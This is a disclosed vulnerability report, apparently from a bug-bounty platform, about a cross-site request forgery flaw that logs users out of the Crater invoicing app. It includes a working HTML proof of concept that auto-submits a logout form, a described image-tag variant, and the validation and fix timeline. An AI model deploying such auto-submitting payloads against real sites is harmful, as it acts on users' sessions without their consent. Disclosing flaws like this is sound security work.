Cross-Site Request Forgery (CSRF) in crater-invoice/crater

Valid

Reported on

Jan 27th 2022


Description

An attacker is able to log out a user if a logged-in user visits the attacker's website.

Proof of Concept

<html>
    <body>
        <script>history.pushState('', '', '/')</script>
        <form action="https://demo.craterapp.com/auth/logout">
            <input type="submit" value="Submit request" />
        </form>
        <script>
            document.forms[0].submit();
        </script>
    </body>
</html>

Impact

This vulnerability allows an attacker to force a logged-in user's browser to log the user out without their intent.

More details

One way a GET logout can be abused is for someone (a competitor, perhaps) to place an image tag with src="<your logout link>" anywhere on the internet; if a user of your site stumbles upon that page, they are unknowingly logged out. This is why logout should be a POST request protected by a CSRF token.

Note

While this cannot harm a user's account, it can be a great annoyance and is a valid CSRF.

We are processing your report and will contact the crater-invoice/crater team within 24 hours. 4 months ago
We have contacted a member of the crater-invoice/crater team and are waiting to hear back 4 months ago
We have sent a follow up to the crater-invoice/crater team. We will try again in 7 days. 4 months ago
We have sent a second follow up to the crater-invoice/crater team. We will try again in 10 days. 4 months ago
Mohit Panjwani validated this vulnerability 3 months ago
KhanhCM has been awarded the disclosure bounty
The fix bounty is now up for grabs
We have sent a fix follow up to the crater-invoice/crater team. We will try again in 7 days. 3 months ago
We have sent a second fix follow up to the crater-invoice/crater team. We will try again in 10 days. 3 months ago
We have sent a third and final fix follow up to the crater-invoice/crater team. This report is now considered stale. 3 months ago
Mohit Panjwani confirmed that a fix has been merged on 2b7028 2 months ago
Mohit Panjwani has been awarded the fix bounty
auth.js#L46-L69 has been validated
web.php#L40-L48 has been validated